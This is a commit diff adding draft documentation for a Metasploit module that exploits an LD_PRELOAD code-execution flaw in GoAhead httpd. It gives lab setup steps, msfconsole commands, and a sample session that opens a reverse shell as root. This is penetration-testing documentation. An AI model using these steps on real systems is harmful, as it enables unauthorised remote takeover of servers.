Add a WIP of the module documentation
parent
1619a3fcf1
commit
b86fd551a3
|
@ -0,0 +1,61 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
The GoAhead httpd server between versions 2.5 and 3.6.4 are vulnerable to an arbitrary code execution
|
||||||
|
vulnerability where a remote attacker can force a supplied shared library to be loaded into the process
|
||||||
|
of a CGI application. This module delivers a shared library payload as the raw data to a POST request
|
||||||
|
and forces this to be loaded by specifying a `LD_PRELOAD` value of `/proc/self/fd/0`.
|
||||||
|
|
||||||
|
### Kali 2017.3 and Ubuntu 16.04 Install Instructions
|
||||||
|
|
||||||
|
These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)
|
||||||
|
|
||||||
|
```
|
||||||
|
git clone https://github.com/embedthis/goahead.git
|
||||||
|
cd goahead/
|
||||||
|
git checkout tags/v3.6.4 -q
|
||||||
|
make > /dev/null
|
||||||
|
cd test
|
||||||
|
gcc ./cgitest.c -o cgi-bin/cgitest
|
||||||
|
sudo ../build/linux-x64-default/bin/goahead
|
||||||
|
```
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Example steps in this format (is also in the PR):
|
||||||
|
|
||||||
|
1. Install the application
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Do: ```use exploit/linux/http/goahead_cgi_exec```
|
||||||
|
4. Do: ```set rhost [ip]```
|
||||||
|
5. Do: ```exploit```
|
||||||
|
6. You should get a shell.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**TARGET_URI**
|
||||||
|
|
||||||
|
Optional. The full path to a CGI endpoint on the target server.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### GoAhead 3.6.4 on Ubuntu 16.04 x64
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] Processing goahead.rc for ERB directives.
|
||||||
|
resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
|
||||||
|
resource (goahead.rc)> set verbose true
|
||||||
|
verbose => true
|
||||||
|
resource (goahead.rc)> set rhost 127.1.1.1
|
||||||
|
rhost => 127.1.1.1
|
||||||
|
resource (goahead.rc)> check
|
||||||
|
<TBD>
|
||||||
|
resource (goahead.rc)> exploit
|
||||||
|
[*] Started reverse TCP handler on 127.1.1.1:4444
|
||||||
|
[*] Sending Exploit to /cgi-bin/cgitest
|
||||||
|
[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
|
||||||
|
uname -a
|
||||||
|
Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||||
|
|
||||||
|
whoami
|
||||||
|
root
|
||||||
|
```
|
Loading…
Reference in New Issue